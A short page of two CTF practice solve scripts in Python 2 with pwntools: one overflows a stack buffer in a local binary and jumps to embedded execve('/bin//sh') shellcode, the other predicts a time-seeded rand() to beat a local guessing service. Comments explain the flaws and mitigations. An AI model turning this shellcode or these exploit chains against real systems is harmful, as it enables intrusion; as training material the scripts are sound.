쉬어가는 문제
pwn1.
from pwn import *
# pwn1: CTF practice solve script (Python 2 / pwntools) for the local ./pwn1 binary.
#
# Defender's reading: this only works because the target (a) prints a stack
# address to the client, (b) lets input run past a fixed-size stack buffer
# into the saved return address, and (c) executes bytes stored on the stack.
# A non-executable stack (NX), a stack canary, or not leaking the address
# would each break this chain.

# 22-byte x86-64 payload; the bytes embed "/bin//sh" and end in a syscall
# with al = 0x3b (execve on Linux x86-64).
shellcode = "\x31\xF6\x56\x48\xBB\x2F\x62\x69\x6E\x2F\x2F\x73\x68\x53\x54\x5F\xF7\xEE\xB0\x3B\x0F\x05"

io = process("./pwn1")
elf = ELF("./pwn1")  # loaded but never referenced again in this script

# The first 14 bytes of output are parsed as hex ("0x" + 12 digits).
# Presumably this is the address of the vulnerable buffer -- confirm against the binary.
leaked_stack = int(io.recv(14), 16)
print("stack : " + hex(leaked_stack))

# Debugging aid: attach gdb with a breakpoint at 0x4005A3. The page does not
# show which instruction sits there; needs gdb and a terminal to run.
gdb.attach(io, 'b *0x4005A3')

# Layout: 0x10 + 8 filler bytes (presumably buffer + saved rbp -- verify),
# then the new return address, then the shellcode. The filler (0x18) plus the
# 8-byte address put the shellcode at offset 0x20 from the start of the
# input, which is why the return address is leaked_stack + 0x20.
payload = "A" * (0x10 + 8) + p64(leaked_stack + 0x20) + shellcode

io.sendline(payload)
io.interactive()
pwn2.
from math import *
from pwn import *
from ctypes import *
import time
# pwn2: CTF practice solve script (Python 2 / pwntools) for the service on 127.0.0.1:1123.
#
# Defender's reading: the script reproduces libc's rand() stream by seeding
# srand() with the current time. Presumably the service seeds the same way
# and checks 35 values -- confirm against the binary. A time-seeded rand()
# is predictable to anyone whose clock is within the same second; secrets
# like these should come from a CSPRNG (e.g. getrandom() or /dev/urandom).

io = remote("127.0.0.1", 1123)
elf = ELF("./third")  # loaded but never referenced again in this script

# Call the C library directly so srand()/rand() behave as they do in a
# native program linked against the same libc.
c_runtime = CDLL("libc.so.6")

seed = c_runtime.time(0)
print(seed)
c_runtime.srand(seed)

# NOTE(review): the page lost its indentation; the three statements below
# are assumed to be the loop body, with interactive() after the loop.
for _ in range(35):
    guess = c_runtime.rand() & 0xf  # keep only the low 4 bits (0..15)
    guess_text = str(guess)
    print(guess_text)
    io.sendline(guess_text)

io.interactive()